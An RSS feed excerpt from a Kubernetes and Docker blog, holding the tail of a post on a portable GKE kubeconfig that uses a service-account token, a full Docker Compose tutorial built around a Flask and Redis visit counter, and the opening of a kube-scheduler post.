gke-demo-test-<span class="hljs-keyword">default</span>-pool-a5aaa3f4-jcnk   Ready    &lt;none&gt;   <span class="hljs-number">18</span>h   v1<span class="hljs-number">.35</span><span class="hljs-number">.1</span>-gke<span class="hljs-number">.1396002</span>

ATTRIBUTE   VALUE
Username    system:serviceaccount:kube-system:shared-access
UID         <span class="hljs-number">9e8</span>d4bdb<span class="hljs-number">-46</span>ea<span class="hljs-number">-4893</span><span class="hljs-number">-9306</span>-d56bea6aa304
Groups      [system:serviceaccounts system:serviceaccounts:kube-system system:authenticated]

yes
</code></pre><p>That's the whole proof. The API server sees <code>system:serviceaccount:kube-system:shared-access</code>, not your Google identity. You can put this file on a machine that has never seen <code>gcloud</code> in its life, and it works.</p>
<h2 id="heading-things-to-know-before-you-ship-this">Things to know before you ship this</h2>
<p><strong>Private clusters still need network reachability.</strong> The kubeconfig removes the auth dependency, not the network one. If your control plane is private, the recipient still needs VPN, authorized networks, or a public endpoint. The token won't help if they can't reach the API server.</p>
<p><strong>The kubeconfig is a credential.</strong> Anyone with the file has whatever RBAC you bound. Store it like you'd store an SSH key or an API token. Don't commit it to Git.</p>
<p><strong>Revocation is deletion.</strong> To kill access, delete the Secret:</p>
<pre><code class="lang-bash">kubectl delete secret shared-access-token -n kube-system
</code></pre>
<p>To kill it harder, also delete the binding and the SA. There's no "rotate" — you mint a new Secret and redistribute the new kubeconfig.</p>
<p><strong>Scope down.</strong> <code>cluster-admin</code> is the demo default, not the production default. A <code>RoleBinding</code> to <code>edit</code> in a single namespace is usually closer to what a real sharing use case needs. <code>ClusterRoleBinding</code> + <code>cluster-admin</code> only when you truly mean it.</p>
<h2 id="heading-wrap">Wrap</h2>
<p>The trick isn't really about GKE — it's about understanding what a kubeconfig <em>is</em>. Once you see it as a glue file between a cluster endpoint and any credential the API server will accept, the exec-plugin auth stops feeling magical and the bearer-token swap becomes obvious.</p>
<p>Same approach works for EKS (where the plugin is <code>aws-iam-authenticator</code> / <code>aws eks get-token</code>), AKS (<code>kubelogin</code>), and anything else that ships exec-based auth. Replace the <code>user:</code> block, keep the <code>cluster:</code> block, and you've got a kubeconfig that travels.</p>
<p><img src="https://cloudmate-test.s3.us-east-1.amazonaws.com/res%2Fhashnode%2Fimage%2Fupload%2Fv1777443629837%2Fe68d717f-9820-48f2-af6c-55be0c211a90.png" alt="The swap: only the users: block changes" /></p>
]]></content:encoded></item><item><title><![CDATA[Day 5: Docker Compose - How Docker Actually Gets Used]]></title><description><![CDATA[7 Days of Docker in 2026 - From docker run Chaos to Declarative Stacks

Nobody types docker run with 15 flags in real life.
I’ve been learning and working with Docker for some time now. I’ve explored ]]></description><link>https://blog.kubesimplify.com/day-5-docker-compose-how-docker-actually-gets-used</link><guid isPermaLink="true">https://blog.kubesimplify.com/day-5-docker-compose-how-docker-actually-gets-used</guid><category><![CDATA[Docker]]></category><category><![CDATA[Docker compose]]></category><category><![CDATA[docker images]]></category><dc:creator><![CDATA[Saloni Narang]]></dc:creator><pubDate>Tue, 28 Apr 2026 13:38:38 GMT</pubDate><enclosure url="https://cdn.hashnode.com/uploads/covers/5f0f325b2259ec1c14c4c49a/621a6671-ce9f-4f66-bd2d-dd827035c5fd.png" length="0" type="image/jpeg"/><content:encoded><![CDATA[<blockquote>
<p><strong>7 Days of Docker in 2026</strong> - From <code>docker run</code> Chaos to Declarative Stacks</p>
</blockquote>
<p>Nobody types <code>docker run</code> with 15 flags in real life.</p>
<p>I’ve been learning and working with Docker for some time now. I’ve explored different setups, experimented a lot, and seen how teams actually use it beyond tutorials. And one thing becomes very clear: the moment you move past basic demos and into real development, you stop writing <code>docker run</code> commands by hand. You write a Compose file.</p>
<p>Everything you learned on Days 1 through 4 - images, Dockerfiles, volumes, container basics - was preparation. Today is the day you learn how Docker actually gets used on real teams, in real codebases, every single day. Docker Compose takes all those individual concepts and wires them into one declarative file that anyone on your team can run with a single command.</p>
<img src="https://cdn.hashnode.com/uploads/covers/5f0f325b2259ec1c14c4c49a/a5f7d48b-5fe5-478f-a915-f16b50c9f460.png" alt="" style="display:block;margin:0 auto" />

<hr />
<h2>Table of Contents</h2>
<ul>
<li><p><a href="#1-what-is-docker-compose">1. What Is Docker Compose?</a></p>
</li>
<li><p><a href="#2-the-compose-file--anatomy-of-a-stack">2. The Compose File — Anatomy of a Stack</a></p>
</li>
<li><p><a href="#3-hands-on-flask--redis-visit-counter">3. Hands-On: Flask + Redis Visit Counter</a></p>
</li>
<li><p><a href="#4-essential-compose-commands">4. Essential Compose Commands</a></p>
</li>
<li><p><a href="#5-2026-features-you-should-know">5. 2026 Features You Should Know</a></p>
</li>
<li><p><a href="#6-what-nobody-tells-you">6. What Nobody Tells You</a></p>
</li>
<li><p><a href="#7-quick-reference">7. Quick Reference</a></p>
</li>
<li><p><a href="#key-takeaways">Key Takeaways</a></p>
</li>
<li><p><a href="#whats-next-day-6">What's Next: Day 6</a></p>
</li>
</ul>
<hr />
<h2>1. What Is Docker Compose?</h2>
<p>Docker Compose is a declarative tool for defining and running multi-container applications. You describe your entire stack - services, networks, volumes, environment variables - in a single YAML file. Then you run one command, and everything comes up.</p>
<p>Consider a Flask web app backed by Redis. Without Compose, your startup ritual looks like this:</p>
<pre><code class="language-bash">docker network create myapp-net
docker volume create redis-data
docker run -d --name redis --network myapp-net -v redis-data:/data redis:alpine
docker build -t myapp-web .
docker run -d --name web --network myapp-net -p 5001:5000 -e REDIS_HOST=redis myapp-web
</code></pre>
<p>Five commands, a dozen flags. And you have not even added health checks, restart policies, or teardown instructions. Now imagine six services instead of two. Now imagine onboarding a new developer.</p>
<p>With Compose, all of that becomes:</p>
<pre><code class="language-bash">docker compose up
</code></pre>
<p>One file. One command. Every developer on the team gets the exact same stack.</p>
<table>
<thead>
<tr>
<th>Without Compose</th>
<th>With Compose</th>
</tr>
</thead>
<tbody><tr>
<td>Scattered <code>docker run</code> flags</td>
<td>Single YAML file, version-controlled</td>
</tr>
<tr>
<td>Manual <code>docker network create</code></td>
<td>Automatic — created for you</td>
</tr>
<tr>
<td>Manual <code>docker volume create</code></td>
<td>Declared in the file, created automatically</td>
</tr>
<tr>
<td>You remember startup order</td>
<td><code>depends_on</code> handles it</td>
</tr>
<tr>
<td>Teardown is 5+ commands</td>
<td><code>docker compose down</code> removes containers and networks (add <code>-v</code> for volumes)</td>
</tr>
</tbody></table>
<blockquote>
<p><strong>Important:</strong> Docker Compose is not a separate install anymore. Since Docker Desktop 4.x and the Compose plugin for Docker Engine, the command is <code>docker compose</code> (no hyphen). The old <code>docker-compose</code> binary is legacy. Use <code>docker compose</code> - always.</p>
</blockquote>
<p>Let me verify we are on the same page:</p>
<pre><code class="language-bash">docker compose version
</code></pre>
<pre><code class="language-console">Docker Compose version v5.0.1
</code></pre>
<p>Good. Let's build something.</p>
<hr />
<h2>2. The Compose File — Anatomy of a Stack</h2>
<p>The Compose file is named <code>compose.yaml</code> (the older <code>docker-compose.yml</code> still works, but <code>compose.yaml</code> is the modern standard). Here is the file we will use for our hands-on exercise, fully annotated:</p>
<pre><code class="language-yaml">services:            # Required: every container in your stack
  web:               # Service name — also becomes the DNS hostname
    build: .         # Build from the Dockerfile in the current directory
    ports:
      - "5001:5000"  # Map host port 5001 to container port 5000
    environment:
      - REDIS_HOST=redis
    depends_on:
      - redis        # Start redis before web

  redis:             # Second service — a Redis server
    image: redis:alpine     # Use a prebuilt image (no build needed)
    volumes:
      - redis-data:/data    # Persist Redis data to a named volume

volumes:             # Top-level: declares named volumes
  redis-data:        # Docker manages this volume's entire lifecycle
</code></pre>
<p>That is the entire definition for a two-service application with persistent storage. Let me break down the key sections.</p>
<p><code>services</code> is the core of every Compose file. Each key (<code>web</code>, <code>redis</code>) becomes a running container. Critically, each service name also becomes a DNS hostname on the Compose network. When <code>web</code> connects to <code>redis:6379</code>, Docker resolves that name automatically.</p>
<p><code>build</code> tells Compose to build an image from a Dockerfile. A dot (<code>.</code>) means "use the Dockerfile in the current directory."</p>
<p><code>image</code> tells Compose to pull a prebuilt image from a registry. A service uses <code>build</code>, <code>image</code>, or both.</p>
<p><code>ports</code> maps host ports to container ports. Format: <code>"HOST:CONTAINER"</code>. Only expose what you need to access from outside Docker.</p>
<p><code>volumes</code>, at the service level, mounts storage into the container. At the top level, it declares named volumes that Docker manages and persists across restarts.</p>
<p><code>depends_on</code> controls startup order. Redis starts before the web app. In production setups, you would pair this with <code>condition: service_healthy</code> and a <code>healthcheck</code>, because the simple form only waits for the container to start, not for Redis to be ready to accept connections. For development, the simple form works fine.</p>
<img src="https://cdn.hashnode.com/uploads/covers/5f0f325b2259ec1c14c4c49a/1649fe30-72bf-488a-ac29-dbbc53aed488.png" alt="" style="display:block;margin:0 auto" />
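<p>Since the simple form of <code>depends_on</code> only orders startup, an application can also guard itself with a small retry loop. The sketch below is one way to do that, not part of the original app; <code>wait_until_ready</code> is a hypothetical helper, and the attempt count and delay are arbitrary defaults.</p>
<pre><code class="language-python">import time


def wait_until_ready(probe, attempts=10, delay=0.5, retry_on=(Exception,), sleep=time.sleep):
    """Call probe() until it succeeds; return the attempt number that worked."""
    for attempt in range(1, attempts + 1):
        try:
            probe()
            return attempt
        except retry_on:
            if attempt == attempts:
                raise  # out of retries: surface the last error
            sleep(delay)
</code></pre>
<p>With a Redis client like the one used later in this post, the call would look like <code>wait_until_ready(r.ping)</code> before the app starts serving requests.</p>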

<hr />
<h2>3. Hands-On: Flask + Redis Visit Counter</h2>
<p>Time to build a real multi-container application. A Flask web app that counts visits, backed by Redis.</p>
<h3>Project Structure</h3>
<pre><code class="language-plaintext">d5-compose/
├── app.py
├── Dockerfile
├── requirements.txt
└── compose.yaml
</code></pre>
<h3>The Flask Application (<code>app.py</code>)</h3>
<pre><code class="language-python">from flask import Flask, jsonify
import redis
import os

app = Flask(__name__)

r = redis.Redis(
    host=os.environ.get("REDIS_HOST", "redis"),
    port=int(os.environ.get("REDIS_PORT", 6379)),
    decode_responses=True
)

@app.route("/")
def home():
    count = r.incr("visits")
    return jsonify(visits=count)

@app.route("/health")
def health():
    try:
        r.ping()
        return jsonify(status="healthy", redis="connected"), 200
    except redis.ConnectionError:
        return jsonify(status="unhealthy", redis="disconnected"), 503

if __name__ == "__main__":
    app.run(host="0.0.0.0", port=5000)
</code></pre>
<p>Two endpoints. The root <code>/</code> increments a counter in Redis and returns it. The <code>/health</code> endpoint verifies Redis connectivity. Simple, testable, real.</p>
<h3>The Dockerfile</h3>
<pre><code class="language-dockerfile">FROM python:3.13-slim

WORKDIR /app

COPY requirements.txt .
RUN pip install --no-cache-dir -r requirements.txt

COPY app.py .

EXPOSE 5000

CMD ["python", "app.py"]
</code></pre>
<h3>requirements.txt</h3>
<pre><code class="language-plaintext">flask==3.1.1
redis==5.3.0
</code></pre>
<h3>The Compose File (<code>compose.yaml</code>)</h3>
<pre><code class="language-yaml">services:
  web:
    build: .
    ports:
      - "5001:5000"
    environment:
      - REDIS_HOST=redis
    depends_on:
      - redis

  redis:
    image: redis:alpine
    volumes:
      - redis-data:/data

volumes:
  redis-data:
</code></pre>
<h3>Bring It Up</h3>
<pre><code class="language-bash">docker compose up --build -d
</code></pre>
<pre><code class="language-console">[+] Building 11.8s (9/9) FINISHED
 =&gt; [web internal] load build definition from Dockerfile
 =&gt; [web] FROM python:3.13-slim
 =&gt; [web] COPY requirements.txt .
 =&gt; [web] RUN pip install --no-cache-dir -r requirements.txt
 =&gt; [web] COPY app.py .
 =&gt; [web] exporting to image
[+] Running 4/4
 ✔ Volume "d5-compose_redis-data"  Created
 ✔ Network d5-compose_default      Created
 ✔ Container d5-compose-redis-1    Started
 ✔ Container d5-compose-web-1      Started
</code></pre>
<p>Read that output. Compose did four things:</p>
<ol>
<li><p><strong>Built</strong> the <code>web</code> image from the Dockerfile.</p>
</li>
<li><p><strong>Created a volume</strong> called <code>d5-compose_redis-data</code> for Redis persistence.</p>
</li>
<li><p><strong>Created a network</strong> called <code>d5-compose_default</code> and attached both services.</p>
</li>
<li><p><strong>Started containers</strong> in dependency order — Redis first, then web.</p>
</li>
</ol>
<p>The naming convention is <code>&lt;project&gt;_&lt;resource&gt;</code> for networks and volumes, <code>&lt;project&gt;-&lt;service&gt;-&lt;n&gt;</code> for containers. The project name defaults to the directory name.</p>
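<p>If you script around Compose, it can help to derive those names instead of hard-coding them. A minimal sketch of the convention described above; the three helper functions are hypothetical, and they ignore overrides such as a custom project name or an explicit <code>container_name</code>.</p>
<pre><code class="language-python">def container_name(project, service, index=1):
    """Containers follow project-service-n."""
    return f"{project}-{service}-{index}"


def volume_name(project, volume):
    """Named volumes follow project_volume."""
    return f"{project}_{volume}"


def network_name(project, network="default"):
    """Networks follow project_network; the implicit one is called default."""
    return f"{project}_{network}"


print(container_name("d5-compose", "redis"))     # d5-compose-redis-1
print(volume_name("d5-compose", "redis-data"))   # d5-compose_redis-data
print(network_name("d5-compose"))                # d5-compose_default
</code></pre>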
<h3>Test It</h3>
<pre><code class="language-bash">curl http://localhost:5001
</code></pre>
<pre><code class="language-console">{"visits":1}
</code></pre>
<pre><code class="language-bash">curl http://localhost:5001
</code></pre>
<pre><code class="language-console">{"visits":2}
</code></pre>
<pre><code class="language-bash">curl http://localhost:5001
</code></pre>
<pre><code class="language-console">{"visits":3}
</code></pre>
<p>The counter increments with every request. The data lives in Redis, not in the Flask process, so it persists across app restarts. This is how real applications work - stateless compute, stateful storage.</p>
<h3>Inspect the Running Stack</h3>
<pre><code class="language-bash">docker compose ps
</code></pre>
<pre><code class="language-console">NAME                 IMAGE            SERVICE   STATUS         PORTS
d5-compose-redis-1   redis:alpine     redis     Up 4 seconds   6379/tcp
d5-compose-web-1     d5-compose-web   web       Up 4 seconds   0.0.0.0:5001-&gt;5000/tcp
</code></pre>
<p>Both containers running. The web service is mapped to port 5001. Redis exposes 6379 internally to the Compose network but is not mapped to the host — exactly right. Your database should never be directly reachable from outside.</p>
<img src="https://cdn.hashnode.com/uploads/covers/5f0f325b2259ec1c14c4c49a/cdf876f6-cf5c-4169-8d03-49ae4ae411de.png" alt="" style="display:block;margin:0 auto" />

<h3>Tear It All Down</h3>
<pre><code class="language-bash">docker compose down -v
</code></pre>
<pre><code class="language-console">[+] Running 4/4
 ✔ Container d5-compose-web-1      Removed
 ✔ Container d5-compose-redis-1    Removed
 ✔ Volume d5-compose_redis-data    Removed
 ✔ Network d5-compose_default      Removed
</code></pre>
<p>One command. Containers, volume, network — all cleaned up. The <code>-v</code> flag removes named volumes, too. Without it, volumes persist so your data survives rebuilds. In development, I use <code>down -v</code> constantly to start fresh. In staging, keep the volumes.</p>
<hr />
<h2>4. Essential Compose Commands</h2>
<p>These are the five commands you will use every day. Learn them well.</p>
<h3><code>docker compose up</code></h3>
<pre><code class="language-bash"># Foreground (logs stream to terminal)
docker compose up

# Detached (background)
docker compose up -d

# Rebuild images before starting (use after code changes)
docker compose up --build

# Start only specific services
docker compose up redis
</code></pre>
<h3><code>docker compose down</code></h3>
<pre><code class="language-bash"># Remove containers + networks
docker compose down

# Also remove volumes (wipes data!)
docker compose down -v

# Also remove the images used by the services
docker compose down --rmi all
</code></pre>
<h3><code>docker compose ps</code></h3>
<pre><code class="language-plaintext">NAME                 IMAGE            COMMAND                  SERVICE   CREATED              STATUS              PORTS
dockerday5-redis-1   redis:alpine     "docker-entrypoint.s…"   redis     About a minute ago   Up About a minute   6379/tcp
dockerday5-web-1     dockerday5-web   "python app.py"          web       About a minute ago   Up About a minute   0.0.0.0:5001-&gt;5000/tcp, [::]:5001-&gt;5000/tcp
</code></pre>
<p>Lists running services, their status, and port mappings. Your first command when debugging.</p>
<h3><code>docker compose logs</code></h3>
<img src="https://cdn.hashnode.com/uploads/covers/5f0f325b2259ec1c14c4c49a/6a23cbec-0f0a-447f-9065-de8df5eaa873.png" alt="" style="display:block;margin:0 auto" />

<pre><code class="language-bash"># All services
docker compose logs

# Follow a specific service in real time
docker compose logs -f web

# Last 50 lines from all services
docker compose logs --tail 50
</code></pre>
<h3><code>docker compose exec</code></h3>
<pre><code class="language-bash"># Open a shell in a running container
docker compose exec web sh

# Run a one-off command
docker compose exec redis redis-cli GET visits
</code></pre>
<blockquote>
<p><strong>Pro Tip:</strong> My actual development loop is: <code>docker compose up -d --build</code>, hack on code, check <code>docker compose logs -f web</code>, repeat. When things get weird, <code>docker compose down -v &amp;&amp; docker compose up -d --build</code> gives you a clean slate in seconds.</p>
</blockquote>
<hr />
<h2>5. 2026 Features You Should Know</h2>
<p>Compose has evolved significantly. If you learned it a few years ago, you are missing some genuinely useful capabilities.</p>
<h3>Compose Watch (Hot Reload)</h3>
<p>This is the feature that changed my development workflow. Instead of rebuilding images after every code change, Compose Watch monitors your files and syncs changes directly into running containers.</p>
<pre><code class="language-yaml">services:
  web:
    build: .
    develop:
      watch:
        - action: sync
          path: ./app.py
          target: /app/app.py
        - action: rebuild
          path: ./requirements.txt
</code></pre>
<pre><code class="language-bash">docker compose watch
</code></pre>
<pre><code class="language-plaintext">WARN[0000] No services to build
[+] up 3/3
 ✔ Network dockerday5_default   Created                                                            0.1s
 ✔ Container dockerday5-redis-1 Created                                                            0.1s
 ✔ Container dockerday5-web-1   Created                                                            0.1s
none of the selected services is configured for watch, consider setting a 'develop' section
</code></pre>
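<p>If your output ends with <code>none of the selected services is configured for watch</code>, as in the capture above, Compose did not find a <code>develop</code> section on any service it loaded; check that the block sits under the service in the Compose file you are actually running. With the section in place, edit <code>app.py</code> and save. The file is synced into the container right away, with no rebuild and no restart. Change <code>requirements.txt</code> and Compose triggers a full rebuild automatically because dependencies changed.</p>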
<p>The example uses two <code>watch</code> actions (Compose also offers <code>sync+restart</code> for changes that need the container restarted):</p>
<ul>
<li><p><code>sync</code> — copies files into the container. Use for source code.</p>
</li>
<li><p><code>rebuild</code> — triggers a full <code>docker compose up --build</code>. Use for dependency files.</p>
</li>
</ul>
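<p>If it helps to see the rule matching spelled out, here is a minimal Python sketch of how a changed file maps to an action under the two rules in the example. Treat it as a mental model, not Compose's implementation: <code>WATCH_RULES</code> and <code>action_for</code> are hypothetical names, and the sketch ignores details such as ignore patterns.</p>
<pre><code class="language-python">from pathlib import PurePosixPath

# Mirrors the two develop.watch rules from the compose.yaml example.
WATCH_RULES = [
    {"action": "sync", "path": "./app.py", "target": "/app/app.py"},
    {"action": "rebuild", "path": "./requirements.txt"},
]


def action_for(changed_file, rules=WATCH_RULES):
    """Return the action of the first rule covering changed_file, or None."""
    changed = PurePosixPath(changed_file)
    for rule in rules:
        watched = PurePosixPath(rule["path"])
        # A rule covers the watched path itself and anything underneath it.
        if changed == watched or watched in changed.parents:
            return rule["action"]
    return None


print(action_for("app.py"))            # sync
print(action_for("requirements.txt"))  # rebuild
print(action_for("README.md"))         # None
</code></pre>
<p>Anything that matches no rule is left alone, which is why files outside the watched paths never trigger a sync or a rebuild.</p>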
<p>This is better than bind mounts for most use cases because it works consistently across macOS, Linux, and Windows, without the filesystem performance issues that plague bind mounts on Mac.</p>
<h3>Profiles</h3>
<p>Profiles let you define optional services that only start when you explicitly activate them. This is how you handle dev/test/prod variations in a single file.</p>
<pre><code class="language-yaml">services:
  web:
    build: .
    ports: ["5001:5000"]

  redis:
    image: redis:alpine

  test-runner:
    build: .
    command: pytest
    profiles: [test]

  debug-tools:
    image: nicolaka/netshoot
    profiles: [debug]
</code></pre>
<pre><code class="language-bash"># Normal development — only web and redis start
docker compose up -d

# Run tests — includes the test-runner service
docker compose --profile test up

# Debug networking — includes netshoot
docker compose --profile debug up
</code></pre>
<p>Services without a <code>profiles</code> key always start. Services with <code>profiles</code> only start when that profile is activated. No more commenting out services in your Compose file.</p>
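<p>The selection rule is small enough to sketch in a few lines of Python. This is an illustration under my own naming (<code>SERVICES</code>, <code>services_to_start</code>), not how Compose is implemented, and it skips cases such as targeting a profiled service by name.</p>
<pre><code class="language-python"># Service name mapped to its profiles list, mirroring the compose.yaml example.
SERVICES = {
    "web": [],
    "redis": [],
    "test-runner": ["test"],
    "debug-tools": ["debug"],
}


def services_to_start(active_profiles=()):
    """Services with no profiles always start; others need an active profile."""
    active = set(active_profiles)
    return [
        name
        for name, profiles in SERVICES.items()
        if not profiles or not active.isdisjoint(profiles)
    ]


print(services_to_start())          # ['web', 'redis']
print(services_to_start(["test"]))  # ['web', 'redis', 'test-runner']
</code></pre>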
<h3>The <code>develop</code> Section</h3>
<p>Beyond <code>watch</code>, the <code>develop</code> section is Compose's answer to the "inner loop" problem — the cycle of code, build, test, repeat. It gives you a structured way to declare which files trigger syncs and which trigger rebuilds, keeping your container up-to-date without manual intervention.</p>
<p>This is Docker's opinionated answer to the question every developer asks: "How do I get my code changes into the container without rebuilding everything?" And honestly, it works well.</p>
<hr />
<h2>6. What Nobody Tells You</h2>
<p>I have seen the same misconceptions trip up developers for years. Let me save you the trouble.</p>
<h3>Compose Creates a Default Network Automatically</h3>
<p>This is the one that surprises people the most. You do not need to add a <code>networks:</code> section to your Compose file. Compose automatically creates a bridge network named <code>&lt;project&gt;_default</code> and attaches every service to it.</p>
<p>All services resolve each other by their service name. When your web app connects to <code>redis:6379</code>, Docker DNS on the default Compose network handles it. No network configuration, no IP addresses, no service discovery tools.</p>
<p>You almost never need explicit <code>networks:</code> in your Compose file. The only time you do is when you are running multiple Compose projects that need to communicate, or when you need network-level isolation between services within the same project (like separating frontend services from database services). For a single-project development setup, the default network is perfect.</p>
<h3>Compose Is NOT an Orchestrator</h3>
<p>This is the big one, and I see it get teams into serious trouble.</p>
<p>Docker Compose is a <strong>development and testing tool</strong>. It runs containers on a single machine. It does not handle:</p>
<ul>
<li><p><strong>Multiple hosts</strong> - Compose cannot spread services across a cluster of servers.</p>
</li>
<li><p><strong>Auto-scaling</strong> - It does not spin up more containers when traffic spikes.</p>
</li>
<li><p><strong>Self-healing</strong> - If a container crashes, <code>restart: unless-stopped</code> will restart it, but there is no real health-based orchestration.</p>
</li>
<li><p><strong>Rolling deployments</strong> - You cannot deploy a new version with zero downtime using Compose alone.</p>
</li>
<li><p><strong>Service mesh, load balancing, secrets rotation</strong> - None of it.</p>
</li>
</ul>
<p>That is what Kubernetes does. Compose is for your laptop. Kubernetes (or a managed platform like ECS, Cloud Run, or Fly.io) is for production.</p>
<p>I have seen startups try to run <code>docker compose up -d</code> on an EC2 instance and call it production. It works until it doesn't - and when it doesn't, you have no observability, no failover, and no way to deploy without downtime. Use Compose for what it is: the best local development tool in the container ecosystem.</p>
<h3>Service Names Are Your DNS</h3>
<p>The service name you pick in <code>compose.yaml</code> is not just a label. It is a real DNS entry on the Compose network. Name your services well: <code>redis</code>, <code>postgres</code>, <code>api</code>, <code>web</code>, not <code>service1</code> or <code>myapp</code>. Your application code references these names directly as hostnames.</p>
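<p>On the application side, that usually means the hostname in your connection string is just the service name. A minimal sketch, assuming hypothetical <code>REDIS_HOST</code> and <code>REDIS_PORT</code> environment variables as optional overrides (the helper <code>redis_url</code> is illustrative, not part of any library):</p>
<pre><code class="language-python">import os


def redis_url(env=None):
    """Build a Redis URL that uses the Compose service name as the hostname."""
    env = os.environ if env is None else env
    # "redis" is the service name from compose.yaml; Docker DNS resolves it.
    host = env.get("REDIS_HOST", "redis")
    port = int(env.get("REDIS_PORT", "6379"))
    return f"redis://{host}:{port}/0"


print(redis_url({}))                       # redis://redis:6379/0
print(redis_url({"REDIS_HOST": "cache"}))  # redis://cache:6379/0
</code></pre>
<p>Rename the service in <code>compose.yaml</code> and the default here has to change with it, which is a good reason to pick the name carefully up front.</p>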
<h3>The Project Name Matters</h3>
<p>Compose derives the project name from your directory name by default. All resource names are prefixed with it: <code>myproject_default</code> (network), <code>myproject_redis-data</code> (volume), <code>myproject-redis-1</code> (container). If you rename your directory, Compose creates all-new resources and orphans the old ones. Set it explicitly with <code>name:</code> at the top of your Compose file if this matters to you.</p>
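<p>To see why a directory rename orphans resources, here is a rough Python sketch of the naming scheme described above. The normalization step is a simplifying assumption on my part (lowercase, then drop unusual characters), and <code>default_resource_names</code> is a hypothetical helper, not a Compose API.</p>
<pre><code class="language-python">import re


def default_resource_names(directory, service, volume, index=1):
    """Names Compose would derive when the project name comes from the directory."""
    # Assumption: simplified normalization (lowercase, then drop anything
    # outside a-z, 0-9, "_" and "-"). Compose's real rules may differ in detail.
    project = re.sub(r"[^a-z0-9_-]", "", directory.lower())
    return {
        "network": f"{project}_default",
        "volume": f"{project}_{volume}",
        "container": f"{project}-{service}-{index}",
    }


before = default_resource_names("myproject", "redis", "redis-data")
after = default_resource_names("myproject-v2", "redis", "redis-data")
print(before["volume"])  # myproject_redis-data
print(after["volume"])   # myproject-v2_redis-data
</code></pre>
<p>The second volume name is brand new as far as Docker is concerned, so the data in the first one is still on disk but no longer attached to anything.</p>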
<hr />
<h2>7. Quick Reference</h2>
<h3>Commands</h3>
<table>
<thead>
<tr>
<th>Command</th>
<th>What It Does</th>
</tr>
</thead>
<tbody><tr>
<td><code>docker compose up</code></td>
<td>Create and start all services</td>
</tr>
<tr>
<td><code>docker compose up -d</code></td>
<td>Start in detached mode</td>
</tr>
<tr>
<td><code>docker compose up --build</code></td>
<td>Rebuild images before starting</td>
</tr>
<tr>
<td><code>docker compose down</code></td>
<td>Stop and remove containers + networks</td>
</tr>
<tr>
<td><code>docker compose down -v</code></td>
<td>Also remove named volumes</td>
</tr>
<tr>
<td><code>docker compose ps</code></td>
<td>List running services</td>
</tr>
<tr>
<td><code>docker compose logs -f &lt;svc&gt;</code></td>
<td>Follow logs for a service</td>
</tr>
<tr>
<td><code>docker compose exec &lt;svc&gt; &lt;cmd&gt;</code></td>
<td>Run command in running container</td>
</tr>
<tr>
<td><code>docker compose stop</code></td>
<td>Stop without removing</td>
</tr>
<tr>
<td><code>docker compose restart</code></td>
<td>Restart services</td>
</tr>
<tr>
<td><code>docker compose watch</code></td>
<td>Start file-watching with hot reload</td>
</tr>
<tr>
<td><code>docker compose config</code></td>
<td>Validate and display resolved config</td>
</tr>
</tbody></table>
<h3>Compose File Keys</h3>
<table>
<thead>
<tr>
<th>Key</th>
<th>Purpose</th>
</tr>
</thead>
<tbody><tr>
<td><code>services</code></td>
<td>Define containers in the stack</td>
</tr>
<tr>
<td><code>build</code></td>
<td>Build image from Dockerfile</td>
</tr>
<tr>
<td><code>image</code></td>
<td>Use a prebuilt image</td>
</tr>
<tr>
<td><code>ports</code></td>
<td>Map host:container ports</td>
</tr>
<tr>
<td><code>volumes</code></td>
<td>Mount volumes or bind mounts</td>
</tr>
<tr>
<td><code>environment</code></td>
<td>Set environment variables</td>
</tr>
<tr>
<td><code>depends_on</code></td>
<td>Define startup dependencies</td>
</tr>
<tr>
<td><code>profiles</code></td>
<td>Assign services to named profiles</td>
</tr>
<tr>
<td><code>develop</code></td>
<td>Configure watch and hot reload</td>
</tr>
<tr>
<td><code>restart</code></td>
<td>Set restart policy</td>
</tr>
<tr>
<td><code>healthcheck</code></td>
<td>Define container health probe</td>
</tr>
<tr>
<td><code>networks</code></td>
<td>Attach to specific networks (usually not needed)</td>
</tr>
</tbody></table>
<hr />
<h2>Key Takeaways</h2>
<ol>
<li><p><strong>Docker Compose is how Docker actually gets used.</strong> One <code>compose.yaml</code> replaces dozens of <code>docker run</code> commands and lives in your repo alongside your code. Every developer on the team gets the same stack.</p>
</li>
<li><p><strong>Networking is automatic.</strong> Compose creates a default network. Services find each other by name - <code>redis</code>, <code>web</code>, <code>postgres</code> - with zero configuration. You almost never need to think about it.</p>
</li>
<li><p><strong>The workflow is</strong> <code>up</code><strong>,</strong> <code>down</code><strong>, and</strong> <code>logs</code><strong>.</strong> Those three commands cover 90% of your daily Compose usage. Add <code>--build</code> after code changes, <code>-v</code> when you want a clean slate.</p>
</li>
<li><p><strong>Compose Watch is the new way to develop.</strong> Forget bind mounts with their cross-platform headaches. The <code>watch</code> block in the <code>develop</code> section gives you hot reload that works consistently everywhere.</p>
</li>
<li><p><strong>Compose is not production infrastructure.</strong> It is the best local development tool in the Docker ecosystem. For production, you need Kubernetes, ECS, or a managed platform. Do not confuse the two.</p>
</li>
</ol>
<hr />
<h2>What's Next: Day 6</h2>
<p>You have gone from typing <code>docker run</code> commands one at a time to defining full application stacks declaratively. That is a massive leap.</p>
<p>But your containers have been talking to each other on Compose's default network without you thinking about it. What happens when you need to control that communication? What if your frontend should reach the API but never the database directly?</p>
<p>In <strong>Day 6: Docker Networking - Connecting Containers</strong>, you will learn:</p>
<ul>
<li><p>How Docker networking actually works under the hood</p>
</li>
<li><p>Bridge, host, and none network drivers - and when to use each</p>
</li>
<li><p>Custom bridge networks for DNS resolution and isolation</p>
</li>
<li><p>Network security: isolating tiers of your application</p>
</li>
<li><p>Multi-network architectures for real applications</p>
</li>
</ul>
<p>The defaults Compose gave you today are great for development. Tomorrow, you will understand what is happening beneath them.</p>
<p>See you tomorrow.</p>
]]></content:encoded></item><item><title><![CDATA[What Actually Happens When kube-scheduler Picks a Node (13 Stages Inside Kubernetes)]]></title><description><![CDATA[Your pod has just been written to etcd. The API server returned 201 Created. The pod exists. But spec.nodeName is still empty, and that is the entire reason this post exists.
A pod with no node is not]]></description><link>https://blog.kubesimplify.com/kube-scheduler-deep-dive</link><guid isPermaLink="true">https://blog.kubesimplify.com/kube-scheduler-deep-dive</guid><category><![CDATA[Kubernetes]]></category><category><![CDATA[scheduler]]></category><category><![CDATA[Internals]]></category><category><![CDATA[Devops]]></category><category><![CDATA[cloud native]]></category><dc:creator><![CDATA[Saiyam Pathak]]></dc:creator><pubDate>Tue, 28 Apr 2026 11:25:13 GMT</pubDate><enclosure url="https://cdn.hashnode.com/uploads/covers/5ef48fe2877d056386648ab2/0829eca6-2223-4bfb-841c-60cfebcb3c3a.png" length="0" type="image/jpeg"/><content:encoded><![CDATA[<hr />
